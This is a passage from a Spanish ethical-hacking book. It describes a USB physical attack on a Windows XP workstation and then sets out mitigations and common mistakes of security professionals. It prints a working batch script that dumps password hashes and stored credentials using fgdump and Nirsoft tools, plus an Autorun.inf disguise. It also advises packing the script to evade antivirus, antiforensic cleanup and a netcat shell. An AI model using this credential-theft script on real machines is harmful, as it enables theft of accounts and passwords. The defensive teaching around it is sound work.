Veamos un ejemplo en detalle. Imaginemos esta acción: una persona pasa porenfrente de la oficina del gerente general o director, ve la puerta abierta -o laabre-, entra e introduce un pendrive (memoria flash USB) en la computadoracon Windows XP. Hace dos clicks, saca el pendrive y se va. Tardó 5 segundosy no instaló nada. ¿Qué fue lo que hizo? Esta persona se llevó en su pendrive:

290

Hacking Etico - [PDF Document] (294)

• Todas las cuentas y passwords hasheados de usuarios del sistema.• Las cuentas de red, passwords de carpetas compartidas.• Usuario y passwords de páginas webs (formularios, homebanking, intranet, etcétera).• Usuario y passwords de cuentas configuradas en clientes de correo (como Outlook).• Usuario y passwords de MSN y cualquier otro mensajero instantáneo.• Configuración de red (IP interna, IP pública, placas, gateway).

Incluso, podría haber hecho esto delante del usuario de la terminal sin que éste sediera cuenta. Veamos por qué y cómo lo logró. La máquina tenía el siguiente seteo:• Windows XP SP2 con todos los parches al día y firewall activado.• Antivirus NOD32 con la actualización (database) de virus al día.¿Qué hay de malo con ello, entonces? No estaba configurada de modo segu-ro, no tenía aplicado hardening alguno y, por otro lado, había un déficit decontrol en la seguridad física.

Win2k8. En el sitio de Microsoft, podemos encontrar un enlace relacionado aun libro que trata la seguridad de Windows 2008 server.

Al instalar Windows XP, se deja al usuario que instala con privilegios de adminis-trador, lo que nos dará los derechos de extraer información de su registro y acce-der a otros archivos del sistema. En cuanto al antivirus instalado por defecto, nochequea las aplicaciones potencialmente peligrosas del módulo scan AMON (mo

291

Hacking Etico - [PDF Document] (295)

nitor del sistema de archivos) ni los demás módulos. De todos modos, vale aclararque estas aplicaciones utilizadas no son virus ni otro tipo de malware. Sólo extraeninformación del registro de Windows y del archivo de cuentas de sistema.Ahora bien, ¿cuál fue el mecanismo para realizar la extracción instantánea de la in-formación? Fue un simple proceso batch, lanzado desde un archivo .bat, con unapequeña rutina secuencial de ejecución de aplicaciones inofensivas. Gracias a ello,la mayoría de los antivirus no las detectan y, al ser ejecutada cada una de ellas, rá-pidamente va guardando en el pendrive la información que extraen.Aplicaciones empleadas:

1. De Nirsoft, Protected Storage PassView (www.nirsoft.net/utils/pspv.html) pue-de generar un archivo con el resultado si es ejecutado mediante línea de coman-do, y extrae los siguientes datos:

• Passwords de Outlook: cuando creamos una cuenta de e-mail en Outlook Ex-press o una cuenta POP3 en Microsoft Outlook y está elegida la opción de pro-piedades de cuenta Recordar contraseña, el password es guardado en ProtectedStorage (servicio de Windows lsass.exe que provee algo de seguridad para guar-dar passwords) y así, esta utilidad puede revelarla instantáneamente.• Autocompletar passwords en Internet Explorer: muchos sitios tienen un for-mulario con los campos de usuario y password para completar. Cuando nos lo-gueamos en dicho sitio, Internet Explorer nos pregunta si queremos que recuer-de ese password para la próxima vez que llegamos allí. Si respondemos Sí, estaclave podrá ser extraída fácilmente a través de Protected Storage PassView.• Sitios protegidos por passwords en Internet Explorer: algunos sitios nos dejanacceder utilizando Basic Authentication o Digest Access Authentication. Cuan-do ingresamos en ellos, Internet Explorer nos mostrará una pantalla de loginpreguntándonos nuestro usuario y password.• MSN Explorer Passwords: MSN Explorer guarda dos tipos de passwords enel Protected Storage. Éstos son: los passwords de sesión y los passwords deautocompletado.

292

Existe un curso muy interesante en inglés que abarca muchos temas relacionado a laseguridad de la información y podran ver el temario aqui: www.careeracademy.com/index.asp?PageAction=VIEWPROD&ProdID=95

HACKING, PENETRATION TESTING AND COUNTERMEASURES TRAINING

Hacking Etico - [PDF Document] (296)

Proggie1. Modo gráfico de PSPV que aparece al darle doble clic.También puede ejecutarse mediante comandos a través del prompt MS-DOS.

2. De Nirsoft, Network Password Recovery (www.nirsoft.net/utils/network-_password_recovery.html). También puede generar un archivo con el resultadosi es ejecutado mediante línea de comando, y extrae:

• Passwords de logins remotos en la LAN.• Passwords de cuentas de e-mail en Exchange server o almacenadas en Outlook2003.• Passwords de MSN Messenger o cuentas Windows Messenger.• De Internet Explorer 7: los passwords de sitios protegidos por passwords (Ba-sic Authentication o Digest Access Authentication).

Proggie2. Interfaz gráfica de la aplicación Network Password Recovery de Nirsoft.

293

Hacking Etico - [PDF Document] (297)

3. FgDump de Fizzgig (www.foofus.net/fizzgig/fgdump/)

Dumper. FgDump dumpea (extrae) los hashescontenidos dentro del archivo SAM, es decir, saca las

cuentas de usuarios de sistema en Windows NT/XP/2000/2003.

4. Archivo ejemplo.bat en el mismo directorio que las aplicaciones de Nirsoft. És-te es el código batch (MS-DOS) que ejecuta las aplicaciones en modo de líneade comando y guarda la información en la carpeta Documents del pendrive.

—-8< Escribir en Notepad y guardarlo como ejemplo.bat

@echo off

start /MIN fgdump -o \Documents\hashes.txt localhost >nulstart pspv /stext \Documents\pass1.txt >nulstart mspass /stext \Documents\pass2.txt >nul

—-8<

Un ejemplo grotesco, aunque se puede mejorar en muchos aspectos, veamos:

• Podrían disimularse los archivos de datos por nombres más desapercibidos co-mo archivos temporales en una carpeta llamada Temp (generar allí t654.tmp,t655.tmp, t656.tmp o bien es posible hacerlo en un solo .tmp).

• El .bat puede convertirse en .exe con la herramienta Quick Batch File Compiler(www.abyssmedia.com/quickbfc/).

294

Hacking Etico - [PDF Document] (298)

• A su vez, este .exe puede cifrarse con la herramienta que encontramos enhttp://upx.sourceforge.net.

• Puede agregarse un comando para que borre del registro la ejecución de estasaplicaciones (técnica antiforense).

• Se puede ejecutar un menú de herramientas portables para disimular la verdade-ra intención del doble clic:

start \PortableApps\PortableAppsMenu\PortableAppsMenu >nul |exit

Este comando ejecutará por último el menú de la aplicación www.portableapps.com.Un ejemplo de ingeniería social sería darle a un ejecutivo el pendrive y pedirle que ha-ga click en el icono de portableapps para ver el menú de aplicaciones para pendrive.Para hacerlo más creíble, el archivo Autorun.inf debería ser más o menos así:

—8<[Autorun]Open=Portable-Apps.exe < este es el .bat hecho .exeAction=Start Portable-AppsIcon=PortableApps\PortableAppsMenu\PortableAppsMenu.exeLabel=PortableApps—8<

Portable. Software portable para dispositivos USB. Es gratuito, no poseespyware y la lista de aplicaciones puede verse en http://portableapps.com/apps.

295

Hacking Etico - [PDF Document] (299)

• Se pueden copiar archivos de la máquina –de la carpeta Mis documentos, del mis-mo escritorio o de la carpeta de Outook-, determinadas extensiones (.doc, .xls,.mdb), pero todo esto demandará mayor tiempo que los dos segundos de esteejemplo, gracias al comando find o la posible transferencia de muchos archivos.Todo ello podría extraerse luego de una forma no física (vía red local o Internet).

• Se puede dejar un servicio activado.• Se puede disparar una shell hacia un netcat en escucha.• Agregar usuarios de administración.• Modificar el archivo HOSTS.• Matar procesos de firewall o antivirus (con kill.exe o pskill.exe).• Todos los binarios .exe pueden ser modificados para que no sean detectados por

antivirus o antispywares (a mano o con alguna aplicación como SoftwarePassportde www.siliconrealms.com).

• Se puede poner a compartir una determinada unidad (C, D) o directorio.• Extraer la información del clipboard.• Extraer más información sobre la red de la terminal o hardware. Por ejemplo con

los comandos:ipconfig >pc.txtnetstat -an >>pc.txtsysteminfo >>pc.txt

• Extraer información sensible de otras terminales en red.

Batch. Sección del sitio www.elhacker.net dedicado a la programación

296

Hacking Etico - [PDF Document] (300)

en batch (MS-DOS/.bat), en donde se explican los conceptos básicos de ella.Hasta es posible dejar atado al programador de tareas el FTK imager lite –o dd- pa-ra que, a determinada hora de la madrugada, realice una imagen perfecta de discoduro en un servidor y que, vía red (con netcat o una unidad compartida), se alojeen el disco duro externo –que luego llevaremos a casa- de una terminal a la cual te-nemos mayor tiempo de acceso que en la organización.El hacking físico no tiene límites, y dos clics pueden lograr que en dos segundos secomprometa la información de un disco duro completo o lo más sensible de la or-ganización si ésta no está debidamente resguardada.

FTK. Sitio de AccessData (www.accessdata.com), desarrolladoresdel excelente FTK Imager Lite para hacer imágenes raw (clonado bit a

bit) de discos y unidades de almacenamiento, aptas para el análisis forense.

¿Cómo mitigar este riesgo? Veamos siete tips para utilizar en organizaciones einstituciones.

Control de acceso al recinto: No cualquier persona debería merodear por todoslos pasillos u oficinas de la organización. Si ésta es grande, lo mejor es manejarsecon niveles de acceso y sistemas biométricos, guardias en el edificio o en el períme-tro, y circuito de cámaras con el almacenamiento de datos protegido. Por supues-to, no hay que olvidarse de cerrar bien la oficina cuando se sale.

Control de acceso a pantalla: En la terminal de trabajo ejecutiva, ésta debe con-tar con el salvapantallas configurado con password a los pocos minutos de inacti-

297

Hacking Etico - [PDF Document] (301)

vidad.

Biométrico. Página web perteneciente a The Biometric Consortium (www.biometrics.org)en la que se listan todos los vendedores de accesorios biométricos para identificación o ve-rificación según caras, huellas, retinas, iris, voz, palma de la mano, modo de escritura, etcé-

tera.

Password. Configuración del salvapantalla para que se active en caso

298

Hacking Etico - [PDF Document] (302)

de no tener actividad en 5 minutos y que, cuando se intente reanudar la actividad

en la terminal, se solicite un password. Muy útil si, a la hora

de ausentarnos de la oficina, alguien intenta utilizar la PC sin nuestro permiso.Políticas de seguridad: todos los empleados y el resto de los recursos humanos li-gados a la organización tienen en claro las políticas de la seguridad de la informa-ción, la concientización, el buen manejo de los recursos informáticos y el procedi-miento. Estas políticas deben estar definidas gracias al análisis del relevamiento ex-haustivo del escenario (de la infraestructura, de recursos lógicos, humanos y ries-gos de los activos), la totalidad de sus procesos y los objetivos de la organización.Es vital que tengan el aval y el compromiso de la Gerencia para llevar a cabo la im-plementación y el acatamiento general de estas políticas.

Desconexión física del hardware o deshabilitarlo mediante el registro: En es-te caso en particular, se puede optar por desconectar los puertos USB de la termi-nal ya sea en forma electrónica o lógicamente (http://support.microsoft.com/de-fault.aspx?scid=kb;en-us;823732), o en otros casos, las grabadoras de CD y DVDo disqueteras. Sin llegar a tener comportamientos extremos, esto puede evitarsecon otras medidas, como la utilización de cifrado por ejemplo.

Deshabilitador. Sitio del producto DeviceLock (www.devicelock.com),que se utiliza para deshabilitar unidades y puertos (USB entre ellos)

mediante grupos de políticas en el sistema.

299

Hacking Etico - [PDF Document] (303)

Cifrado de información: Utilizar PGP Desktop Enterprise, Steganos Security Sui-te 2007 o TrueCrypt (www.kriptopolis.org/truecrypt-windows-01) para cifrar la in-formación sensible de los documentos en la PC o en particiones destinadas a res-paldo de información (backups).

Cifrador. Sitio de TrueCrypt (www.truekrypt.org), aplicación que cifra datos on-the-fly (en tiempo

real, totalmente transparente al usuario) desde la misma memoria, muy recomendado y libre.

Detección de aplicaciones malintencionadas: Instalar y setear debidamente losescáneres de malware (antivirus y antispyware), ya que la configuración que tienenpor defecto al instalarlos no es recomendable. En la actualidad, los más recomen-dados son: NOD32 de la firma ESET y Ad-Aware 2008 Pro de Lavasoft.

300

Hacking Etico - [PDF Document] (304)

Antispyware. Website de Lavasoft (www.lavasoftusa.com), desarrolladores de Ad-aware y otrosproductos relacionados con la detección y eliminación de spyware en nuestras máquinas.

Privilegios de invitado:No utilizar el usuario por defecto de Windows XP, ya quede esta manera es como se infectan las máquinas con malware, porque éste tieneprivilegios de administrador sobre el sistema. Si se utiliza un usuario con privilegiosde invitado, lo que se ejecute no podrá instalarse, alterar archivos de sistema, reali-zar cambios en el registro de Windows o extraer las cuentas de usuarios del siste-ma.Para hacerlo, vamos a cambiar los privilegios del usuario desde Inicio/Ejecutar…,ingresamos compmgmt.msc y presionamos Aceptar. En la ventana que se abre, va-mos a Usuarios locales y grupos/Usuarios. Hacemos click con el botón derechosobre el nombre del usuario que vamos a modificar y elegimos Propiedades. Va-mos a la solapa Miembro de, hacemos click sobre Administradores y presionamosQuitar. Luego, pulsamos Agregar…, escribimos y hacemos click en Aceptar.

301

Para buscar amanomalware que haya ingresado en una terminal o servidor, son recomendables Autoruns y

ProcessMonitordeSYSINTERNALS,yRootkitRkUnhooker,Unlockerypskill.exe, incluidoenPStoolsdeFounds-

tone.Antesconviene tenerhechounsnapshot (imagen)del registro limpiodeWindowspara versi semodificó y

compararloconunsnapshotde lamáquina infectadacon lautilidadWhat’sRunning (www.whatsrunning.net).

Búsqueda manual de malware

Hacking Etico - [PDF Document] (305)

Invitado. Pantalla que muestra el cambio de los privilegio del usuario.Al reiniciar el equipo, nuestro usuario no tendrá privilegios sobre el sistema,

como tampoco los programas (o virus) que intenten ser instalados a través de él.

Este ejemplo (técnicamente mejorado, claro está) fue testeado en servidores Win-dows 2003 con Active Directory de grandes organizaciones, servidores Exchange yen terminales ejecutivas con Windows XP SP2 y, en todos los casos, funcionó. Es-to es posible hacerlo en otras plataformas como Linux o Unix, aunque de otros mo-dos.

Errores mas comunes(cometidos por los aspirantes a profesional de seguridad)

Veamos ahora un mix en cuestiones de gestión, humanas y técnicas basadas en si-tuaciones reales para tener presentes como referencia.

302

En el centro de enseñanza virtual del CERT www.vte.cert.org/vteweb/Library/Library.aspx podemos encontrar videos instructivos online (entre otros formatos ) que seencuentran organizados en 25 categorías en las que podemos buscar por keywords.

CERT ENSEÑA

Hacking Etico - [PDF Document] (306)

Abordar el trabajo con escaso conocimiento técnico, con poca lógica o sincreatividad: Éste es el motivo principal de la falsa sensación de seguridad de unaempresa luego de haber contratado a un supuesto profesional de la seguridad sinque éste poseyera los suficientes conocimientos técnicos o de procedimientos parahacer el trabajo de un modo correcto. Si en seguridad informática o de la informa-ción sólo se aplicaran soluciones técnicas o se tuviera que seguir únicamente deter-minada metodología plasmada en un simple checklist, el estado general de las gran-des organizaciones sería un desastre. La ausencia tanto de sentido común como decapacidad para analizar y resolver problemas complica aún más las cosas.

Abordar el trabajo con escaso conocimiento del escenario: Al profesional, enuna reunión con directivos y administradores, pueden intentar brindarle todos losdetalles acerca del escenario. Pero si éste no hace un relevamiento exhaustivo porsu cuenta o no realiza todas las preguntas, abarcando la totalidad de los componen-tes y procedimientos, es muy probable que algún aspecto se deje de lado y eso seauna potencial brecha de seguridad en el sistema de información.

Abordar el trabajo sin previa definición de la metodología por emplear ni elalcance por etapa: Si el profesional no planifica los pasos por seguir, es probableque recurra a una secuencia de trabajo poco eficiente. De ese modo, los lapsos y lademanda de tiempo, dinero y personal se incrementarán. Incluso, arriesgando a queen ese período aparezcan nuevas amenazas al entorno, no habiendo adoptado to-davía las medidas de mitigación a la problemática (en este caso el aseguramiento),cuando aún era tan sólo de carácter potencial.

Abordar parte del trabajo antes de pautar la autorización: Es de una total fal-ta de ética y tacto el asestar siquiera un escaneo antes de definir el contrato o pau-ta de autorización para el trabajo. Además, si un administrador da cuenta de ello(mirando algún log o monitor), podrían generarse problemas de otro tipo: huma-nos, legales (según país) y hasta de producción.

Desconocer los falsos positivos: Los falsos positivos son aquellos resultados

303

Si desean conocer mas ejercicios para llevar a cabo con unidades opticas o pendrives,tienen que leer estos sitios: wiki.hak5.org/wiki/USB_Switchblade o wiki.hak5.org/wiki/USB_Hacksaw o bien: www.usbhacks.com Recuerden que estos tipos de scripts estánindexados por antivirus, por eso es preferible un método casero, indetectable.

USB como herramienta de hackeo físico

Hacking Etico - [PDF Document] (307)

imposibles que genera una herramienta en busca de vulnerabilidades. Por ejem-plo, si chequeamos un server FreeBSD y, al finalizar, en el reporte se nos diceque en su IIS 5.0 hay una determinada vulnerabilidad, debemos reconocer quees imposible porque no puede estar presente una falla de una aplicación utilizadaen un servidor Windows. Por eso, confiar ciegamente en los resultados de unaherramienta automatizada es un grave error. Aparte de que ésta tiene que serajustada previamente para llevar tal chequeo, los resultados o el reporte tienenque ser analizados para descartar los falsos positivos -o analizar los falsosnegativos- (más aún cuando los administradores tienen cierto sentido del humoral editar los banners de servicios o falsear el resultado de la detección mediantefingerprint). Por lógica, si un supuesto profesional reporta un falso positivo, auto-máticamente se desacreditará todo el trabajo de reporte.

Redactar procedimientos de seguridad inútiles: Las normas y procedimientostienen incidencia directa en el escenario. Si tenemos a alguien que escribe procedi-mientos incoherentes o impracticables, el sistema con seguridad estará en modo deriesgo. Por ejemplo, uno que diga: La clave root del servidor principal tiene que es-tar resguardada bajo el método split knowledgement, y cada parte deberá ser deconocimiento por cada uno de los administradores a cargo en su turno. Split know-ledgement significaría, en este caso, que cada administrador deberá conocer tan só-lo una parte de la clave y no su totalidad. Qué pasaría si el administrador que estáa cargo en su turno un sábado a las 5 am sufre una intrusión y cuando se da cuen-ta:

• El intruso está dumpeando –extrayendo- los datos más importantes de su orga-nización, millones de registros y los envía afuera.

• Acto seguido el intruso, como root, expulsa al administrador de su propio servidormatándole la sesión. ¿Qué hará? Tendría que apagar el servidor o desconectarlo dela red (con todo lo que ello significaría para la integridad del sistema, producción ydatabases) o bien encontrar al resto de los administradores para ver cómo hacenpara loguearse (éstos pueden estar en los más diversos lugares y estados de concien-cia).

304

OSSEC es una herramienta open source multiplataforma, basada en HIDS (Host-basedIntrusion Detection System) que integra: ingenieria de análisis, análisis de registros,chequeo de integridad en archivos, monitoreo de registro, políticas centralizadas,detección de rootkits y alertas en tiempo real. http://www.ossec.net/main/

OSSEC (HIDS TOOL)

Hacking Etico - [PDF Document] (308)

• Incluso, el intruso a esa altura ya habrá modificado el password de root –o re-nombrado el archivo o finalizado el servicio de login- y wipeado (borrado de mo-do seguro) sus rastros desde un servidor interno, que a su vez tiene conectado víaon the fly a otro que se encuentra en un pueblito de Kazajstán.

Ese procedimiento citado tiene cero dinámica y puede empeorar las cosas en unmomento que ya de por sí es crítico.Prestemos mucha atención: un gran teórico de la gestión de la seguridad de la in-formación puede, por sí solo, llegar a redactar cosas impracticables en la realidady contexto del escenario. Por eso, el relevamiento de infraestructura y el conoci-miento técnico de la totalidad de los componentes más el seguimiento y el controlde los factores humanos, lógicos y procesos que lo rodean es de suma vitalidad pa-ra lograr buen material normativo.

Utilizar plantillas (templates) predefinidas para la elaboración del conte-nido de políticas: No es lo mejor utilizar políticas adaptables. En primer lu-gar, por una cuestión ética de no venderle un enlatado de seguridad a una or-ganización que maneja datos sensibles y nos paga un trabajo a medida o respon-sable. En segundo lugar, porque es un riesgo, ya que esa falta de relevamientoexhaustivo (artesanal) de procesos deja librados pequeños aspectos del sistema.Finalmente, porque no hay dos organizaciones iguales, ni siquiera dos sucursa-les de una misma firma.Si no se tiene el conocimiento de todos los aspectos de un escenario para hacerlobien, hay que conformar un equipo de trabajo y reclutar a la gente adecuada paracada campo. McDonalizar la seguridad informática de la organización, a la largase termina pagando caro. Exacto, además de todas las típicas amenazas y riesgos,hay intrusos y procesos del tipo Gourmet.

Elegir entre chequeo de seguridad en producción o fuera de ella: Hay quehacer ambas, porque son dos estados diferentes en los procesos y flujo de infor-mación. Si fuéramos médicos, sería como tomar la presión sanguínea a alguienque está haciendo deporte y a otro que está durmiendo, con todo lo que ello re-

305

Si estamos interesados en ampliar nuestros conocimientos sobre lockpicking, pode-mos encontrar la mítica guía MIT de lockpicking traducida al español en la dirección:www.lockpickingsport.com/articulos-y-traducciones/327-por-fin-la-guia-mit-en-espanol.html

Guía de lockpicking

Hacking Etico - [PDF Document] (309)

presentaría en los resultados.Por otro lado, hay que prestarle especial atención a los componentes que puedenllegar a sufrir el estrés del proceso o flujo de datos. Imaginemos qué sucedería si adeterminada hora de producción se cae un firewall.

No saber aprovechar e interpretar los errores generados en los sistemas ono saber generarlos: Es un caso muy normal en el hacking ético. Si no se che-quea a mano, algún output (información de error que notaríamos al hacer una pe-tición http manual o del protocolo que sea) se puede perder, incluso algunos nole ven la utilidad y lo dejan pasar, cuando un intruso inteligente jamás subestima-ría tal dato. El afán por la automatización en la búsqueda de vulnerabilidades esuno de las causantes.Generar errores en una aplicación online mediante peticiones HTTP es extremada-mente útil, ya que se conocen tecnologías, directorios, versiones, claves, códigofuente, archivos ocultos, backups, datos sensibles o útiles de todo tipo.

Focalizar sobre un solo aspecto de la seguridad: Es usual que sólo se con-temple un aspecto de la seguridad informática de la organización y no todos.Lo más común es hacer foco en el aspecto técnico. Muchos creen que con uti-lizar varios firewalls, algún enlace vía SSL (cifrado) en la intranet, un adminis-trador de perfil técnico sentado frente al servidor y un puñado de antivirus enlas terminales ya es suficiente para garantizar seguridad de la información insti-tucional. Nada más errado. Las normativas y la calidad del recurso humanotambién cuentan.

Malos reportes luego del Network Security Assessment: El modo en el que seentregue está sujeto a quien lo tenga que interpretar. Cuestiones de diseño grafico, re-tórica, estética u orden se pueden dejar a un lado o bien delegar a un diseñador, perosi se olvida la enumeración de las cosas en su totalidad, se omiten datos relevantes ose expresan de modo confuso, excesivo, barroco o bizarro, es un grave error.

Exponer el escenario personal o descentralizar información sensible sin

306

Aunque la tecnologíaavanzaadiario, algunasde lasnuevascreacionespuedengenerarproblemasenciertos

ámbitos.Sivisitamoslossitioswww.getusb.info/category/usb-fever/yhttp://spanish.getusb.info/lector-62-en-

1-si-no-lo-tiene-no-lo-necesitas/paraverlasnovedades,realmentetenemosqueponernosapensarenelim-

pacto quepuede tener este tipo deherramientas enmanosde los empleados deunaorganización.

Tecnologías USB al alcance de todos

Hacking Etico - [PDF Document] (310)

autorización: Se ha visto muchas veces a encargados de la seguridad de un es-cenario o proyecto enviar información sensible sin cifrar a una casilla de correoelectrónica personal, información muy precisa del escenario mediante gráficos enarchivos .vsd (Microsoft Visio), sus passwords y configuraciones, documentos enWord o PDF de procedimientos y normas u otra información útil. Esto repre-senta un descuido de muy alto riesgo con el agravante de que, seguramente, esetipo de desvío de información no está autorizado por la organización o por algúncomité de seguridad, y encima un intruso hábil podría interceptarlo.

No ser eficiente: La diferencia entre eficacia y eficiencia, en una organización quepuede derrochar o destinar muchos recursos a un proyecto, quizá no cuente dema-siado. Pero en cuestiones de seguridad informática, la eficiencia en tiempo esfundamental. No ser eficiente en ese punto puede llegar a exponer potencialmentelos activos de la organización.

Haz lo que digo (no lo que hago): Es indispensable que uno mismo adopte lasmedidas de cuidado en sus propios activos. Nunca se sabe cuándo alguien va a in-tentar comprometerlos. Por ejemplo, si recomendamos a todo el mundo que utili-ce 12 caracteres en la contraseña, debemos aplicarlo también a las nuestras.

Subestimar al usuario final de terminales: El típico usuario o empleado, conuna terminal conectada a Internet dentro de la organización, es un factor para te-ner muy en cuenta ya que, si no se lo limita en privilegios y se lo educa en cuantoa políticas de uso o controles, puede ser a corto y mediano plazo un grave proble-ma. Entre otras cosas podría:• Visitar páginas inapropiadas.• Instalar programas del tipo P2P.• Manipular correo electrónico con malware.• Descentralizar información institucional a traves de mensajeros o correo.• Conectar pendrives u otras unidades de almacenamiento.• Conectar notebooks infectadas.• Conectarse fuera de la organización a través de un nodo wireless ajeno a ésta (con

el riesgo de que le tomen todas sus claves).• Tratar de extraer información de otras terminales o servidores.• Publicar o dejar información de la organización en Internet u otro medio.• Asignar claves de administración por su cuenta.• Ser víctima de ingeniería social.

No mantenerse debidamente informado: ¿Por qué es bueno estar informado alinstante y continuamente de las fallas o técnicas de intrusión que se hacen públicasdía a día? Más allá de nuestro interés en ese tipo de noticias por lo que aporta al co-

307

Hacking Etico - [PDF Document] (311)

nocimiento, su importancia radica en que, si alguna se relaciona a nuestro sistema,hay que tomar las medidas correspondientes para que éste no corra riesgos.

Desestimar reportes de seguridad de terceros o subestimar al atacante queutiliza técnicas simples: Muchos jóvenes suelen probar herramientas como es-cáneres, técnicas a mano o bien exploits, en recursos que están en Internet, conlas más diversas intenciones. Algunos de estos reportan desinteresadamente la fa-lla encontrada en el sistema a sus administradores o a algún contacto responsableque hayan encontrado. La mayoría de estos reportes suelen ser desestimados, mi-nimizados o directamente ignorados por alguien en la organización, sin pensar queluego otro intruso (esta vez con malas intenciones) puede hallarlo y explotarlo.Generalmente, esos reportes caen en manos del responsable de dicho descuido ypor eso no pasan de allí. Difícilmente un administrador le diga a su jefe: “He des-cuidado los servidores, recién avisaron que se puede entrar a nuestra red..., perono se preocupe que ahora mismo lo soluciono.”A ese error se le suma el prejuicio de categorizar a los intrusos (que ya han come-tido el acto o lo están intentando) en script kiddies, crackers, hackers o lamerscuando todos éstos se valen de cualquier tipo de técnica que tienen a su alcance ode la que pueden llevar a cabo debido a sus limitaciones. Por ejemplo, si un intru-so extremadamente preparado e inteligente descubrió un login en el que usuario yclave son admin/admin, ¿no lo va a utilizar porque fue muy fácil hallarlo? Lo uti-lizará sin duda alguna. Un administrador minimizará el hecho diciendo que unscript kiddie entró con el típico usuario admin de clave admin y que ya está todosolucionado, mientras que en realidad posiblemente haya backdoors en los princi-pales servidores, ningún rastro de la intrusión interna, ni de su permanencia.El intruso menos preparado no sólo probará el admin/admin, sino que tiene al-go que los empleados con responsabilidades no poseen: mucho, pero mucho,tiempo libre. Luego de probar lo poco que conoce a raíz de su falta de conoci-mientos, podría quedarse aletargado esperando a que se presente una falla fácilde explotar o algún descuido del administrador y, de ese modo, comprometer elescenario. Por ejemplo, en un escenario seguro, pero con varios servers ya iden-tificados con IIS 6.0 + ASP, una noche de sábado se publica un exploit para esacombinación en una lista pública de seguridad. Acto seguido, esa persona se en-tera, lo busca, lo compila y lo utiliza a las 2 am, cuando el administrador que so-lucionará la falla a la mañana siguiente está durmiendo. Incluso, podrá dedicarsenoches enteras a buscar esa falla al azar en otras redes. Quizás sólo deforme unapágina web para alimentar su ego intentando demostrar lo hacker que es, mien-tras que el intruso experimentado tratará por todos los medios de pasar desaper-cibido, ocultando rastros y procesos, ya sea para interceptar información sensibleinterna o utilizar los recursos para comprometer los activos de otra organización.En definitiva, un intruso es un intruso, no importa lo preparado que esté o

308

Hacking Etico - [PDF Document] (312)

la intención que tenga. El escenario debe asegurarse de modo correcto. Siun tercero a la organización reporta casualmente una falla, por más irrisoria que és-ta parezca, debemos solicitarle detalles, actuar rápido para solucionarla y ser agra-decidos.

Este es el agradecimiento de la gente de Google por un pequeño reporte deseguridad que realicé en junio pasado:

Google Security <[emailprotected]> 20-junPara: Carlos ToriFecha: 20-jun-2007 9:05Asunto: Re: [#845274691] Vulnerability report, XSS at groups.google.com.

Hi ,

Thank you for your note.

Thank you for bringing this issue to our attention. Google takes thesecurity of our services very seriously and we are currentlyinvestigating your report. We appreciate your cooperation anddiscretion on this matter while we are looking into it. We willfollow up with you soon.Thanks very much,

Christoph KernGoogle Security Team

NOTE: This message was sent by a human.

Confiar plenamente en los administradores: Si el profesional de seguridadtiene sólidos conocimientos técnicos en cuanto a sistemas operativos, el solo re-levamiento del estado de los servidores le dará un claro panorama acerca del ni-

309

Además del listado de conductas equivocadas que vemos aquí, podemos encontrar otras cosas

que debemos aprender a evitar en www.sans.org/resources/mistakes.php. Aunque la informa-

ción está en inglés, encontraremos otras conductas erróneas ligadas al aspecto de administra-

ción, del tipo técnico.

Más conductas erróneas

Hacking Etico - [PDF Document] (313)

vel de quien los mantiene. Los procedimientos no servirán de nada si no se aca-tan, pero tampoco servirán de mucho si los que tienen que acatarlos no tienencomo hacerlo. El administrador ideal es aquel que es proactivo, dedicado e ins-truido.

Hacer preferencia de plataformas: Recomendar u optar por una plataforma pa-ra todo o para la mayoría del escenario sólo porque nosotros tenemos afinidad ha-cia ella o la conseguimos en oferta o la elegimos por la capacidad de venta de quiennos la ofertó, es un grave error. No hay que entrar en el error de comparar siste-mas operativos para ver cuál es mejor, ya que cada uno tiene una aplicación, casoy tipo de usuario. Si el escenario va a llevarse a cabo desde cero o a modificarse,como primer paso debe haber un detallado análisis de la situación: ¿a qué tarea, ser-vicio o tipo de procesamiento se va a dedicar el sistema operativo?, ¿qué tipo deusuario habrá y cuál será su soporte?, ¿qué presupuesto hay para licencias y hard-ware? Sobre esa base, tomamos una determinación.

Delegar el reclutamiento de personal de seguridad a gente sin experiencia:Si somos un único profesional de la seguridad, sería una tarea titánica asegurarlos activos de una gran organización.Por eso, necesitaremos un equipo de gente.Si tenemos experiencia, probablemente ya deberíamos conocer a las personas indi-cadas para tal tarea (sean de la propia empresa, colegas o tercerizados) y, llegado alcaso de que éstos estén ocupados o no deseen integrar el equipo por diferentes mo-tivos, deberemos reclutar personal para conformar ese grupo de trabajo.Al hacerlo, uno de los errores más graves consiste en delegar ese reclutamiento aun departamento de recursos humanos sin el apoyo de alguien con demasiada ex-periencia en el tema, ya que el resultado puede ser desalentador. Por ejemplo, po-drían conseguirnos un grupo de jóvenes no aptos para la tarea, pero con la suficien-te habilidad de comunicación como para pasar algunas entrevistas, o con títulos desistemas, pero sin experiencia real alguna ni las capacidades mínimas necesarias.

310

Hacking Etico - [PDF Document] (314)

Repositorio. En http://mirrors.easynews.com/blackhat&defcon/encontramos uno de los mayores repositorios públicos de registros

de video y sonido sobre conferencias de seguridad existentes a la fecha.

TÉCNICAS MÁS AVANZADAS DE ETHICAL HACKING

Las técnicas de ethical hacking son incontables, y en este libro nos basamos en losconceptos más simples por una cuestión de espacio. En pocas palabras, es un ma-nual de nociones básicas de carácter introductorio, no académico (deberán esperarmi tesis) ni profundamente técnico. Imaginemos que los libros para preparar exá-menes para certificaciones del tipo CISSP tienen más de mil páginas, y sólo son re-visiones de preguntas tipo multiple choice.Más allá de las técnicas avanzadas existentes, hay formas de resolución de proble-mas que, en el momento de la intrusión o comprobación de seguridad, quedan su-jetas al ingenio del profesional y que pueden llegar a ser de un alto nivel de com-plejidad. Algunos claros ejemplos de este tipo pueden verse en el sitio de Román(www.rs-labs.com/papers/i64-reto_IV-solve.txt), en las presentaciones de congre-sos tipo Defcon, Pastcon, Blackhat o bien en ezines como Phrack (1-63).Las técnicas sofisticadas pueden estar asociadas a Criptografía y Criptanálisis, Wi-

311

Entre otros documentos relativos a la seguridad de una organización, en www.sans.org/readin-

g_room/whitepapers/awareness/ podemos descargar el Data Center Physical Security Checklist

de SANS, que nos puede resultar de gran ayuda para aumentar la conciencia sobre cuestiones de

seguridad física y repasar los aspectos que pueden hacer vulnerable nuestro ambiente.

Datacenters y organizaciones

Hacking Etico - [PDF Document] (315)

